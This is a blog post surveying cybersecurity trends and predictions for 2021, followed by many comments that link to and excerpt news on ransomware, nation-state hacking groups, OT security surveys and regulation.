Nothing is more difficult than making predictions. For this reason I did not do any “predictions for 2021 cyber security” posting before year 2021 started. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
The State of internet security in 2020 was hard. The trends that stormed last year will continue long to 2021: “Rapidly accelerated digital transformations, opportunistic phishing campaigns, discontinuity of information security operations and financial constraints are creating the perfect storm in a COVID-19-disrupted world.” Last year trend was Instead of ‘bring your own device’, these days it’s rather ‘bring your own office’.
2020 was a bumper year for cybercriminals, and this boom is expected to continue into 2021. 2021 Cybersecurity and IT Failures Roundup article presents you Lessons learned from the many failures, interruptions, crimes and other IT-related setbacks that made the news in 2020. Smart cyber security people have read about them and learned their lesson.
Kaspersky’s top three cybersecurity predictions for 2021 are increase in targeted attacks, attacks that are more disruptive exploiting contemporary issues and we will continue to have frequent and significant data breaches. I can pretty much agree on those. Cybersecurity must adapt to counter new threats in a transformed world
Head of Europol’s European Cybercrime Centre: there are no systems that cannot be breached article says that humankind has to choose between evolution by digitization, and stagnation. Naturally, the world is moving ahead. We can’t be naive and expect that bad things will not happen along with it. “We can’t be naive and expect that bad things will not happen along with it. Resilience is important.”
In 2021 Trend Micro predicts that cybercriminals will look to home networks as a critical launch pad to compromising corporate IT and IoT networks. New Cybersecurity Threat Predictions for 2021 article points out the the traditional network perimeter has been replaced with multiple edge environments, WAN, multi-cloud, data center, remote worker, IoT, and more, each with its unique risks.
DDoS attacks: Big rise in threats to overload business networks. Cyber attackers are threatening to take organisations offline with DDoS attacks if they aren’t paid bitcoin by a deadline – but victims are being urged not to give in to demands.
One sure bet is that ransomware attacks will only escalate further over this year. Pay-or-Get-Breached Ransomware Schemes Take Off in 2021. In 2020, ransomware attackers moved quickly to adopt so-called “double extortion” schemes, which means that first they encrypt your data so you can’t access it and then they say they will publish your most secret data for other people to see if you don’t pay up. Ransomware victims that have backups are paying ransoms to stop hackers leaking their stolen data.
Modern cybercrime is becoming increasingly open-sourced which means that already some of the most sophisticated and notorious cybercriminals are utilizing open-source tools to conduct their criminal activities and this will increase.
Trend Micro survey results claim that AI set to replace humans in cybersecurity by 2030. I am just wondering what this claim means and have people who have answered to the survey really understood AI and cyber security? My predictions is that we will need humans and AI and even traditional solutions for a long long time.
The lack of people with cyber security skills is still a problem for many companies because AI will not replace them any time soon. There are different views how the situation has developed. Cybersecurity Skills Shortage Falls for First Time article claims that that shortfall in skills has therefore dropped from 4.07 million last year to 3.12 million. As The End Of 2020 Approaches, The Cybersecurity Talent Drought Gets Worse article says that information technology industry has a real problem on its hands – and it’s only getting worse. While cybercrime grows exponentially, businesses are facing a severe cybersecurity talent drought. The supply of available, qualified security professionals is insufficient and the competition for services has dramatically increased. Some companies try to make claims that they have invented a “silver bullet” for educating cyber professionals like This educator claims to have invented an entertaining way to learn cybersecurity. Some of the cyber security issues move to cloud, so we need more people who know security and cloud. The Cloud Talent Drought Continues (And Is Even Larger Than You Thought)
Hackers leverage sophisticated and novel techniques to break into networks article tells that recent SolarWinds and JetBrains attacks are prime examples of why state-sponsored attacks are so dangerous. The hackers leveraged sophisticated, novel techniques to break into networks and obtain backdoor access to government agencies and enterprises. Expect to see more break-ins connected to those incidents and expect more similar incidents that have not just year been revealed.
Want to avoid having your online accounts hacked? Enable two-factor authentication. Better than the best password: How to use 2FA to improve your security article tells that this is a crucial security measure that requires an extra step when signing in to high-value services. The article explains how to set up 2FA and which accounts to focus on first.
A new version of OWASP Top-10 is coming this year. OWASP Top-10 2021 Statistics-based proposal article tries to make an OWASP Top-10 2021 predictions calculated by understandable metrics, make everyone able to reproduce the results, and present to an entire community for the feedback.
Privacy is an illusion. But that‘s a good thing article says that everyone’s information is available. It doesn’t matter who you are. Some people would pay lots of money to get that privacy illusion back and some just don’t care. With the Death of Cash, Privacy Faces a Deeply Uncertain Future article says that in One Future We have a Private, Anonymous Alternative to Cash but in the Black Mirror Future the Money in Your Pocket Knows Everything About You. Cash is dying that’s for sure. There are still ways to sen anonymous emails and it is a good idea to prepare to your digital life after death.
Ransomware attacks will explode in 2021 article claims that the Capitol riot and its aftermath makes the case for tech regulation more urgent, but no simpler. Against increased regulation there are freedom of speech sounding issues like Should Jack Dorsey be able to silence the president of the United States? Whether the storming of the US Capitol was an attempted coup, an insurrection, or an assault on democracy is merely a question of semantics. The US is now the focus of global instability. EU chief warns over ‘unfiltered’ hate speech and calls for Biden to back rules for big tech.
Legal requirements for IoT security start to emerge article tells that legislative activities are starting to make security a legal requirement for consumer IoT designs to have vaguely defined “reasonable security features”. US Government is beginning to create legislation mandating IoT security. The US House of Representatives, for instance, introduced H.R. 1668 – The Internet of Things Cybersecurity Improvement Act of 2020. There are NIST recommendations such as NISTIR 8259 — Foundational Cybersecurity Activities for IoT Device Manufacturers. EU introduces a cyber security IoT standard to protect its citizens and ENISA Publishes Guidelines on Securing the IoT Supply Chain.
7 Cybersecurity Predictions for Smart Buildings and Infrastructure for 2021: Continuous patch management and security updates, OT transparency for IT stakeholders, Natively secure OT network, Cloud-based access to remote sites instead of VPN, Zero touch onboarding, More cybersecurity in small facilities, Certified cybersecurity products and solutions.
IoT security is still complicated. For many development teams, the idea of building cybersecurity into their IoT design can seem daunting. 6 essential activities to help developers build in IoT cybersecurity article gives some ideas to improve cyber security in your IoT development.
2,203 Comments
Tomi Engdahl says:
Microsoft will now snitch on you at work like never before
https://www.zdnet.com/article/microsoft-will-now-snitch-on-you-at-work-like-never-before/
You think there are limits to what your employer can see you do online? Some new Microsoft updates may make you think a little more about that.
Tomi Engdahl says:
Denuvo-Protected Games Rendered Unplayable After Domain Expires
https://torrentfreak.com/denuvo-protected-games-rendered-unplayable-after-domain-expires-211108/
Tomi Engdahl says:
Everything You Need to Know About Web Application Firewalls (WAFs)
https://wpmudev.com/blog/web-application-firewall-waf-guide/
Tomi Engdahl says:
https://pentestmag.com/understanding-detecting-c2-frameworks-babyshark/
Tomi Engdahl says:
The hunt for NOBELIUM, the most sophisticated nation-state attack in history https://www.microsoft.com/security/blog/2021/11/10/the-hunt-for-nobelium-the-most-sophisticated-nation-state-attack-in-history/
This is the second in a four-part blog series on the NOBELIUM nation-state cyberattack. In December 2020, Microsoft began sharing details with the world about what became known as the most sophisticated nation-state cyberattack in history. Microsoft’s four-part video series “Decoding NOBELIUM” pulls the curtain back on the NOBELUM incident and how world-class threat hunters from Microsoft and around the industry came together to take on the most sophisticated nation-state attack in history. In this second post, we’ll explore the investigation in the second episode of the docuseries.
Tomi Engdahl says:
Lazarus hackers target researchers with trojanized IDA Pro https://www.bleepingcomputer.com/news/security/lazarus-hackers-target-researchers-with-trojanized-ida-pro/
A North Korean state-sponsored hacking group known as Lazarus is again trying to hack security researchers, this time with a trojanized pirated version of the popular IDA Pro reverse engineering application.
Tomi Engdahl says:
Are cybercriminals turning away from the US and targeting Europe instead?
https://blog.malwarebytes.com/malwarebytes-news/2021/11/are-cybercriminals-turning-away-from-the-us-and-targeting-europe-instead/
Significant cyberattacks against critical targets in Europe have doubled in the past year, according to EU figures obtained by CNN. And with the announced pressure from the US against major ransomware gangs we can expect these figures to go up even more. For now it is hard to tell whether the increased amount of attacks in Europe is some sort of waterbed effect due to the US government’s harder stance against cybercriminals and ransomware in particular. It could be that it is simply ransomware groups expanding to new markets due to more competition among themselves and greener pastures on the other side of the pond. In the ransomware industry, the time of “spray and pray” is long gone. Most of the well known groups know exactly which kind of targets they want to go after and even when the best time to strike is. So it’s not unlikely that we will see more of these attacks on online shops and large retailers with the shopping season around the corner.
Tomi Engdahl says:
The Far-Reaching Attacks of the Void Balaur Cybermercenary Group https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-far-reaching-attacks-of-the-void-balaur-cybermercenary-group
As cyberattacks have become a common tool in the offensive arsenals of powerful organizations, an industry has developed that is based around providing cyberattack services, tools, and even training to potential customers. One of the major players in this industry are the so-called “cybermercenaries” groups or individuals that, as the name suggests, offer different kinds of internet-based products and services to their clients, such as governments, crime organizations, and even businesses, for a price. We have been investigating one of these cybermercenaries a threat actor known as Void Balaur (aka Rockethack) for more than a year and discovered that the group has been launching cyberattacks against prominent targets, some of which have even resulted in real-life consequences. Our research paper, titled Void
Balaur: Tracking a Cybermercenary’s Activities, provides a deep dive into the group’s activities, offerings, targets, connections with other threat actors, and the potential consequences its attacks might have on its victims. Research (PDF):
https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf
Tomi Engdahl says:
How Artificial intelligence (AI) Stops Cybercriminals
https://www.hackread.com/how-artificial-intelligence-ai-stops-cybercriminals/
Newer AI algorithms are extremely good at analyzing data traffic, access, and transfer, as well as detecting outliers or anomalies in data trends. Below are some of the ways AI can prevent and mitigate the damage caused by cybercrime.
Tomi Engdahl says:
Businesses don’t know how to manage VPN security properly – and cyber criminals are taking advantage
https://www.zdnet.com/article/many-organisations-dont-know-how-to-manage-vpn-security-properly-and-cyber-criminals-are-taking-advantage/
Remote working has resulted in a rise in the use of corporate VPNs.
But inexperience means many businesses aren’t equipped to look for and patch security vulnerabilities being exploited by malicious hackers.
Tomi Engdahl says:
RPC Firewall Dubbed ‘Ransomware Kill Switch’ Released to Open Source
https://www.securityweek.com/rpc-firewall-dubbed-ransomware-kill-switch-released-open-source
Today at Black Hat London, Zero Networks announced the release of its RPC firewall – also dubbed the ‘ransomware kill switch’ – into open source. The tool provides granular control over RPC, capable of blocking the use of lateral movement hacker tools and stopping almost all ransomware in its tracks.
Microsoft’s Remote Procedure Call (MS-RPCE) lies at the heart of Windows. It effectively manages the relationship between clients and servers – if a client requests from a server, it goes through RPC; This happens both locally and between remote devices.
RPC was introduced into Windows back in the days of Windows 2000 and has been ever-present since then. This has two effects. Firstly, RPC was built with little or no security. While there is a documented Event for a remote RPC call, it hasn’t been implemented. Further, the Event Tracing for Windows (ETW) option will likely result in millions of RPC client/server events every hour, but doesn’t tell you where the call came from, nor which user was concerned.
Secondly, RPC use has spread over time into every aspect of Windows computing. “There is almost nothing you can do without RPC — whether to get information or change information. Everything is done via RPC,” explains Benny Lakunishok, co-founder and CEO at Zero Networks, and another product of Israel’s IDF conveyor belt.
Normal attempts to block RPC ports could rapidly cause the network to fail.
Over the last year, a relatively small number of ransomware gangs have been responsible for the majority of big game hunting ransom attacks: Maze, Conti, REvil, Netwalker, DoppelPaymer, DarkSide and Avaddon. In every case–with the exception of Avaddon– RPC has been used for reconnaissance and lateral movement.
The common hacker tools used for lateral movement – such as BloodHound, mimikatz, CobaltStrike, PS-Empire, PsExec and WMIC – all use RPC. But you cannot simply block the use of RPC. And even if you are able to detect something, detection is often too late.
To solve this problem and provide auditing, visibility and control over RPC calls, Zero Networks developed an agent that scans the machine and finds the RPC processes. “The agent hooks into those it finds in a legitimate manner (nothing malicious) so that it sees everything.,” Lakunishok told SecurityWeek.
“We provide full auditing and visibility so we can see, these are calling these RPC functions. Finally, we can map who is calling which RPC function. We can also create a whitelist. Even though RPC supports thousands of functions, only a few are really needed. We allow those and block everything else. We provide granular control over what RPC is doing. We can block the rest. Down the drain goes most of the attack tactics, and tools.”
More importantly in today’s threat landscape, something like 86% of ransomware will be stopped in its tracks. “Ransomware is a bit simpler in the way it operates,” continued Lakunishok. “If you block just one of the things it uses, it simply doesn’t move anymore.”
https://zeronetworks.com/
“ Zero Networks for the first time delivers an easy-to-setup, scalable, and effective zero trust solution „
Tomi Engdahl says:
ICS, OT Cybersecurity Incidents Cost Some U.S. Firms Over $100 Million: Survey
https://www.securityweek.com/ics-ot-cybersecurity-incidents-cost-some-us-firms-over-100-million-survey
A report published on Wednesday by the Ponemon Institute and industrial cybersecurity firm Dragos shows that the average cost of a security incident impacting industrial control systems (ICS) or other operational technology (OT) systems is roughly $3 million, and some companies reported costs of over $100 million.
The report is based on data from a survey of 600 IT, IT security, and OT security practitioners conducted by the Ponemon Institute in the United States.
Twenty-nine percent of respondents admitted that their organization was hit by ransomware in the past two years, and more than half of them said they had paid an average ransom of more than $500,000. Some organizations reported paying more than $2 million.
Nearly two-thirds of respondents said they experienced an ICS/OT cybersecurity incident in the past two years. The most common causes were negligent insiders, a maintenance-related issue, or IT security incidents “overflowing” to the OT network due to poor segmentation between IT and OT.
On average, it took organizations 170 days to detect an incident, 66 days to investigate it, and 80 days to remediate the incident. A calculation based on the total number of hours it would take a team of six people to detect, investigate, and remediate an incident showed a total labor cost of nearly $1 million. Adding roughly $2 million for downtime, legal costs, regulatory fines, and equipment replacement results in an average total cost of approximately $3 million.
Of the companies that confirmed suffering an incident, 1% said the total cost of the ICS/OT incident exceeded $100 million, and 2% reported costs between $10 million and $100 million. Overall, 13% of respondents said the incident had cost them more than $1 million.
The report published by Dragos and Ponemon focuses on the “cultural divide” between IT and OT teams and its impact on their ability to secure both IT and OT environments.
2021 STATE
OF INDUSTRIAL CYBERSECURITY
The Risks Created by the Cultural
Divide Between the IT & OT Teams
https://hub.dragos.com/hubfs/Reports/2021-Ponemon-Institute-State-of-Industrial-Cybersecurity-Report.pdf?hsLang=en
Tomi Engdahl says:
The Rising Threat Stemming From Identity Sprawl
https://www.securityweek.com/rising-threat-stemming-identity-sprawl
Identity sprawl in the age of remote working and business transformation is a threat to cybersecurity
The identity sprawl generated by remote working and business digitization is out of control. This is the clear message from a global survey of more than 1,000 IT professionals.
The survey was undertaken by Dimensional Research for One Identity, a provider of unified identity security, and returned similar results across all industry verticals.
Larry Chinski, One Identity’s VP of global IAM strategy, described the three primary results of the survey (PDF). These are the rapidly expanding and almost unchecked growth in the number of identities in use (sprawl); the large number of different tools used to manage the identities, leading to poor overall visibility; and the need to find a unified approach to identities as a solution.
“We found that organizations have experienced an enormous amount of identity sprawl, especially over the last two years,” he told SecurityWeek. Eighty-four percent of the respondents said the number of identities they manage has more than doubled. Twenty-five percent said the number of identities they manage has increased by a factor of 10 or more. And 95% of the respondents are struggling to manage them.
https://www.oneidentity.com/docs/2021-identities-and-security-survey-results-white-paper-29725.pdf
Tomi Engdahl says:
Security is Everywhere. Can Your Services Keep Up?
https://www.securityweek.com/security-everywhere-can-your-services-keep
Today’s networks require flexible services designed to accompany efforts to protect any user accessing any service from any location on any device
Cloud adoption and the rapid transition to remote work have permanently changed how companies do business. And now, as organizations begin to bring employees back to the office using a hybrid work model, organizations have had to deploy highly dynamic and adaptable hybrid networks. These recent changes have resulted in a proliferation of devices and users working from anywhere, which has expanded the digital attack surface and exposed more applications, devices, data, and users to risk.
Understanding and controlling data, applications, and traffic moving across and between these divergent environments is crucial to maintaining security. But this becomes complicated as hybrid and multi-cloud environments adopt new technologies like zero-trust access (ZTA), zero-trust network access (ZTNA), secure SD-WAN that combine physical, cloud, and endpoint devices into an integrated solution. And it becomes even more complicated when things like identity and access management (IAM) policies and an array of tools designed to protect applications and platforms are added to the mix.
Tomi Engdahl says:
Over 90% of OT Organizations Experienced Cyber Incidents in Past Year: Report
https://www.securityweek.com/over-90-ot-organizations-experienced-cyber-incidents-past-year-report
A survey conducted recently by cybersecurity firm Fortinet showed that more than 90% of organizations that use operational technology (OT) systems have experienced some sort of cyber incident in the past year.
Fortinet’s 2021 State of Operational Technology and Cybersecurity Report is based on responses received in late February and early March from 100 people working for organizations with more than 2,500 employees in the manufacturing, energy and utilities, healthcare, and transportation sectors.
2021 The State of Operational Technology and Cybersecurity
https://www.fortinet.com/resources-campaign/operational-technology/2021-the-state-of-operational-technology-and-cybersecurity?utm_source=blog&utm_campaign=2021-the-state-of-operational-technology-and-cybersecurity
Tomi Engdahl says:
Bradley Chambers / 9to5Mac:
Apple unveils Business Essentials for SMBs, with device management, iCloud storage, and more, starting at $2.99 per month per user and launching in spring 2022 — Apple is introducing a new business offering called Apple Business Essentials that combines device management …
Apple launches Apple Business Essentials: Device management, storage, onsite repairs, and more for one monthly price
https://9to5mac.com/2021/11/10/apple-business-essentials/
Apple is introducing a new business offering called Apple Business Essentials that combines device management, 24/7 phone support for IT and end-users, business iCloud storage, and an option for onsite repairs for businesses of up to 500 employees. The free beta period launches today with the full service coming in the spring of 2022.
“Small businesses are at the core of our economy, and we’re proud that Apple products play a role in helping these companies grow,” said Susan Prescott, Apple’s vice president of Enterprise and Education Marketing. “Apple Business Essentials is designed to help streamline every step of employee device management within a small business — from setup, onboarding, and upgrading, to accessing fast service and prioritized support, all while keeping data backed up and secure, so companies can focus on running their business.”
Tomi Engdahl says:
Catalin Cimpanu / The Record:
Trend Micro report details the activities of hacker-for-hire group Void Balaur, which has targeted US telecom companies and others since the mid-2010s — Cyber-security firm Trend Micro has published today a 46-page report detailing the history and activity of a hacker-for-hire group …
Cyber-mercenary group Void Balaur has been hacking companies for years
https://therecord.media/cyber-mercenary-group-void-balaur-has-been-hacking-companies-for-years/
Cyber-security firm Trend Micro has published today a 46-page report detailing the history and activity of a hacker-for-hire group that has been advertising its services in the cybercrime underworld and conducting on-demand intrusions since the mid-2010s.
Named Void Balaur, the group was involved in attacks that targeted victims for both financial and surveillance gains. Past attacks targeted IT companies, telecoms, and activists, journalists, and religious leaders alike.
Trend Micro said that because of the large number of target overlaps, it initially thought Void Balaur to be related or a subgroup of APT28 (Pawn Storm), a codename used to track cyberattacks carried out by agents of Russia’s military intelligence agency, the GRU.
“In total, we have observed a dozen email addresses that were targeted by both Pawn Storm during the period of 2014 to 2015, and by Void Balaur from 2020 to 2021,” Trend Micro said today.
The Far-Reaching Attacks of the Void Balaur Cybermercenary Grou
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-far-reaching-attacks-of-the-void-balaur-cybermercenary-group
As cyberattacks have become a common tool in the offensive arsenals of powerful organizations, an industry has developed that is based around providing cyberattack services, tools, and even training to potential customers.
Tomi Engdahl says:
5 Steps To Improve Your Security API
https://pentestmag.com/5-steps-to-improve-your-security-api/
#pentest #magazine #pentestmag #pentestblog #PTblog #API #security #cybersecurity #infosecurity #infosec
Tomi Engdahl says:
https://thehackernews.com/2021/11/researchers-uncover-hacker-for-hire.html
Researchers Uncover Hacker-for-Hire Group That’s Active Since 2015. A new cyber mercenary hacker-for-hire group dubbed “Void Balaur” has been linked to a string of cyberespionage and data theft activities targeting thousands of entities as well as human rights activists, politicians, and government officials around the world at least since
2015 for financial gain while lurking in the shadows.
Tomi Engdahl says:
FBI: Iranian threat actor trying to acquire leaked data on US organizations https://therecord.media/fbi-iranian-threat-actor-trying-to-acquire-leaked-data-on-us-organizations/
The US Federal Bureau of Investigation says that a threat actor known to be associated with Iran is currently seeking to acquire data from organizations across the globe, including US targets.
Tomi Engdahl says:
Tiny Font Size Fools Email Filters in BEC Phishing
https://threatpost.com/tiny-font-size-email-filters-bec-phishing/176198/
The One Font BEC campaign targets Microsoft 365 users and uses sophisticated obfuscation tactics to slip past security protections to harvest credentials.
Tomi Engdahl says:
Congress Mulls Ban on Big Ransom Payouts Unless Victims Get Official Say-So https://threatpost.com/congress-ban-ransomware-payouts/176213/
A U.S. lawmaker has introduced a bill the Ransomware and Financial Stability Act (H.R.5936) (PDF) that would make it illegal for financial firms to pay ransoms over $100,000 without first getting the governments permission.
Tomi Engdahl says:
U.S. Gov Announces Support for ‘Paris Call’ Cybersecurity Effort
https://www.securityweek.com/us-gov-announces-support-paris-call-cybersecurity-effort
United States Vice President Kamala Harris on Wednesday formally announced support for the Paris Call for Trust and Security in Cyberspace, an international collaborative initiative aimed at advancing cybersecurity.
Issued in 2018, the Paris Call details nine principles to improve stability in cyberspace through global collaboration, and has been already signed by 79 countries.
The principles promoted by the Call include:
Protecting individuals and infrastructure
Protecting against activity that affects the availability of the Internet
Protecting the electoral process
Protecting intellectual property
Preventing the proliferation of malware and nefarious practices
Improving the security of digital processes, products and services
Strengthening an advanced cyber hygiene
Preventing non-state actors from hacking back
Promoting international norms in cyberspace
Through supporting the Call, the United States said it will commit to advancing cybersecurity and preserving an open and reliable Internet.
Tomi Engdahl says:
Nearly 100 TCP/IP Stack Vulnerabilities Found During 18-Month Research Project
https://www.securityweek.com/nearly-100-tcpip-stack-vulnerabilities-found-during-18-month-research-project
An 18-month research project has resulted in the discovery of nearly 100 vulnerabilities across more than a dozen TCP/IP stacks.
The research, named Project Memoria, was conducted by enterprise device security firm Forescout in collaboration with others. It resulted in the discovery of the vulnerabilities tracked as Ripple20, AMNESIA:33, NUMBER:JACK, NAME:WRECK, INFRA:HALT, and NUCLEUS:13.
TCP/IP stacks are leveraged by a wide range of devices for communication, including medical products, industrial control systems (ICS), printers, and switches.
Researchers have identified a total of 97 vulnerabilities across 14 TCP/IP stacks, including ones that can be exploited for remote code execution, DoS attacks, or to obtain sensitive information. The flaws impact hundreds of products, with researchers estimating that there are roughly 3 billion vulnerable devices.
Project Memoria targeted a total of 15 TCP/IP stacks, including CycloneTCP, FNET, FreeBSD, IPnet, lwIP, MPLAB Net, NetX, NicheStack, NDKTCPIP, Nucleus NET, Nut/Net, picoTCP, Treck, uC/TCP-IP, and uIP. In only one of them, lwIP, researchers haven’t found any vulnerabilities.
Some of these TCP/IP stacks have been around for nearly 30 years, but they are still actively developed. While their developers continue to release patches for vulnerabilities, those patches often don’t make it to end user devices, in large part due to what researchers describe as “silent patching.” Silent patching refers to some developers fixing vulnerabilities without assigning CVE identifiers, which results in device vendors and their customers not knowing about the flaws.
“[Silently patched vulnerabilities] exist in very critical supply-chain software, so there are millions of devices out there that have been vulnerable for a long time without even their vendors knowing about it because other vendors chose to remain silent,” Forescout said in a report summarizing Project Memoria. “Silently patching a vulnerability does not mean that nobody will get to know about it: these issues tend to be rediscovered again and again.”
Concluding Project Memoria –
Lessons Learned after 18 Months
of Vulnerability Research
https://www.forescout.com/resources/project-memoria-lookback-report/
Tomi Engdahl says:
Enlisting Employees to Fight Cyber Threats
https://www.securityweek.com/enlisting-employees-fight-cyber-threats
With another Cybersecurity Awareness Month behind us, this is the perfect time to kick off or refresh a security awareness and training program for employees. The more that non-technical staff employees know about security issues, the better they can recognize, report, and even prevent threats.
Comprehensive security training is a great way for organizations to enlist employees in the fight against cyber threats. At the same time, such training is highly valued by cybersecurity teams which appreciate having knowledgeable individuals who support their own expertise.
Year-Round Training
Most organizations rely too heavily on their cybersecurity pros to protect them from threats, ignoring the painful reality that human error is by far the most common cause of security breaches.
IBM has found that human error is the cause of up to 95 percent of cybersecurity breaches, and estimates that a data breach costs a company $4.24 million per incident on average.
Human error can be drastically reduced by raising all employees’ awareness of cybersecurity issues. The most effective way to do that is using year-round training. Regular training courses, offering theory-based and hands-on learning, are essential so employees can gain and keep knowledge. Occasional training simply doesn’t help employees to develop tangible cyber skills.
Go Beyond Basic Training
In too many cases, organizations expose employees to pretty much the same basic content each October, presenting such topics as ‘how to spot a phishing email,’ ‘understanding malware and ransomware’, and ‘the dangers of opening unknown attachments.’
Employee Hands-on Training is not Difficult
There are plenty of resources (including free ones) that cybersecurity practitioners can use to expose interested employees to security concepts in action.
A good way to proceed is to create an outline that covers basic cybersecurity terminology and concepts, includes an overview of the threat landscape and threat actors, and then delves into the nuts and bolts of cybersecurity, security operations, digital forensics, data analysis, and so on.
Day in the Life of the SOC
Additionally, cybersecurity teams can host a tour of the security operations center (SOC), or even a more hands-on day in the life of the SOC. The day visit should be built around modules and challenges that present real IT infrastructure, real threats, and real solutions.
The goal of the visit should be to inspire new cybersecurity advocates cross-functionally and to identify hidden talent ideal for a SOC Analyst position.
Conclusion
To combat constant cybersecurity threats, reduce human error, and cut the punitive costs of breaches, organizations need to provide all employees with advanced, year-round training. Cybersecurity advocates throughout the company are the best defense against threat actors.
Tomi Engdahl says:
The Wild West of the Nascent Cyber Insurance Industry
https://www.securityweek.com/wild-west-nascent-cyber-insurance-industry
Cyber Insurance is a work in progress, with many existing customers effectively guinea pigs
The basic problem for the cyber insurance industry is easy to state but hard to solve. Income (premiums) must exceed outgoings (claims) by around 30% (operating costs + profit). If claims increase, so must premiums for the insurance model to remain viable.
But the cost of cybercrime is rising dramatically and has been doing so consistently for many years. Continually increasing premiums to counter continuously increasing claims is ultimately unsustainable. Sooner or later, the cost of insurance will make it too expensive to be an effective form of risk management for business. The insurance industry must therefore find an alternative method of balancing its books if it is to succeed.
There is a potential solution. Decreasing costs (claims) improves the profit/loss ratio much faster than increasing sales (premiums). This is the area now being considered by the insurance industry. First, costs can be reduced by increasing exclusions in the insurance policy – but that decreases the value of insurance as a risk management tool, and there is a finite limit to its use. Second, if the customers’ security posture can be improved sufficiently to reduce claims, then the cost of insurance can also decrease (or at least be maintained at current levels).
Tomi Engdahl says:
Contrast Security Raises $150 Million at ‘Unicorn’ Valuation
https://www.securityweek.com/contrast-security-raises-150-million-unicorn-valuation
Code security company Contrast Security this week announced that it has closed $150 million Series E funding round at a billion-dollar valuation, making the company the latest cybersecurity unicorn.
The company offers a platform that helps developers create more secure applications by discovering vulnerabilities in code, detecting what libraries are being used, and goes as far as providing embedded runtime exploit prevention that analyzes application runtime to prevents and confirm exploitability of bugs.
Contrast says the investment will help it meet demand for its platform and that it will use the funds to accelerate global expansion plans, to further gain market share. The new infusion of cash will also help the company “execute on strategic opportunities and acquisitions.”
Tomi Engdahl says:
Verkkorikolliset ovat kiinnostuneita koulutuksesta ja tutkimuksesta – Suomessa myös puolustusvoimista
https://www.uusiteknologia.fi/2021/11/12/verkkorikolliset-ovat-kiinnostuneita-koulutuksesta-ja-tutkimuksesta/
Verkkorikolliset hyökkäsivät maailmanlaajuisesti useimmin koulutus- ja tutkimusaloille, kertoo tietoturvayhtiö Check Point arviossaan. Suomessa verkkohuijareiden suosikkiala oli yrityksen mukaan teollisuus ja Pohjoismaissa valtionhallinto sekä puolustusvoimat. Mukana myös Suomen yleisimmät haittaohjelmat lokakuulta 2021.
Check Pointin mukaan maailmanlaajuisesti yksi 61:sta organisaatiosta kärsii kiristysohjelmista joka viikko. ’’Se on järkyttävä luku ja yritysten on tehtävä enemmän’’, toteaa Check Pointin Suomen ja Baltian maajohtaja Sampo Vehkaoja.
Hänen mukaansa monet hyökkäykset alkavat yksinkertaisella sähköpostilla, joten käyttäjien koulutus tunnistamaan nämä uhat on yksi organisaatioiden tärkeimmistä torjuntakeinoista.
Lokakuussa Suomen yleisin haittaohjelma on kiristysohjelma Mailto. Maailmanlaajuisesti kärkisijaa pitää viidennen kerran Trickbot. Uutena on myös palvelinkoneiden Apachen haavoittuvuus, joka on noussut nopeasti eniten hyödynnettyjen haavoittuvuuksien top10:een.
”Apache HTTP Server Directory Traversal”. Apache julkaisi paikkauksen ohjelmistoonsa, mutta se todettiin riittämättömäksi. Apache HTTP Server -palvelinohjelmistossa on yhä haavoittuvuus, jonka onnistunut hyödyntäminen voi antaa hyökkääjälle pääsyn järjestelmän tiedostoihin.
Tomi Engdahl says:
So. What’s Up With All These Crazy Event Networks Then?
https://hackaday.com/2021/11/11/so-whats-up-with-all-these-crazy-event-networks-then/
Forget the CTF, Connecting To WiFi Is The Real Challenge!
There no doubt comes a point in every traveling hacker’s life when a small annoyance becomes a major one and a rant boils up from within, and perhaps it’s ETH0’s misfortune that it’s at their event that something has finally boiled over. I’m speaking of course about wireless networks.
While on the road I connect to a lot of them, the normal commercial hotspots, hackerspaces, and of course at hacker camps. Connecting to a wireless network is a simple experience, with a level of security provided by WPA2 and access credentials being a password. Find the SSID, bang in the password, and you’re in. I’m as securely connected as I reasonably can be, and can get on with whatever I need to do. At hacker camps though, for some reason it never seems to be so simple.
Instead of a simple password field you are presented with a complex dialogue with a load of fields that make little sense, and someone breezily saying “Just enter hacker and hacker!” doesn’t cut it when that simply doesn’t work. When you have to publish an app just so that attendees can hook up their phones to a network, perhaps it’s time to take another look .
This use of WPA2 enterprise security makes sense for the security conscious administrator even if it’s annoying for the end user to configure, and as it turns out it’s the next pulldown labelled “Authentication” that’s the annoying one on my system. By default it shows “Tunnelled TLS” as its sprotocol, where it turns out that the hacker camp networks use “Protected EAP (PEAP)”. This is a protocol that protects the initial key exchange against a third party eavesdropping on packets and hijacking the connection.
The Network Giveth Security, And Then Taketh It Away
There are a few options for identity, domain, and certificate authentication servers, but the next important setting is a checkbox: “No CA certificate is required”. This is both important and infuriating, because going back to the point earlier about WPA2 Enterprise requiring a signed certificate, it appears to dispense with that entirely making the whole point of all this annoying configuration meaningless.
So if you use a protocol that requires a certificate to authenticate the access point and then do without the certificate, where is the benefit? I am no networking guru, but as far as I can see it lies in PEAP protecting my key exchange. Since my access point isn’t authenticated using a certificate there is nothing to stop a malicious third party setting up a rogue access point and capturing my connection anyway, so that benefit seems marginal.
I started this investigation from a standpoint of being annoyed at arcane WiFi set-ups, and assuming I understand the configuration correctly I have ended it unsure whether there is any benefit to the end user of having it in the first place. If you’re a wireless networking guru then please weigh in down in the comments, I’d really like to know.
Meanwhile I have a suggestion. Most camps have two networks, the WPA2 Enterprise one described above, and an open “insecure” one with no encryption and sometimes precious little between client and the wider internet. Can I suggest that they also have a network running WPA2 Personal, like every Starbucks, and leave the extra configuration for the 1337? It would save *so* much confusion!
Tomi Engdahl says:
Campbell Kwan / ZDNet:
Biden signs the Secure Equipment Act of 2021, denying FCC licenses to national security threats, effectively banning Huawei and ZTE network equipment in the US — The Secure Equipment Act of 2021 received bipartisan support prior to it being signed by Biden.
US President Biden signs law to ban Huawei and ZTE from receiving FCC licences
The Secure Equipment Act of 2021 received bipartisan support prior to it being signed by Biden.
https://www.zdnet.com/article/us-president-biden-signs-law-to-ban-huawei-and-zte-from-receiving-fcc-licences/
US President Joe Biden on Thursday signed into law bipartisan legislation that will ban companies like Huawei and ZTE from getting approval for network equipment licences in the US.
The legislation, Secure Equipment Act of 2021, will require the Federal Communications Commission (FCC) to adopt new rules that clarify it will no longer review or approve any authorisation applications for networking equipment that pose national security threats.
Last year, the FCC formally designated Huawei and ZTE as national security threats, with that decision being made as the agency found that both companies had close ties to the Chinese Communist Party and China’s military apparatus.
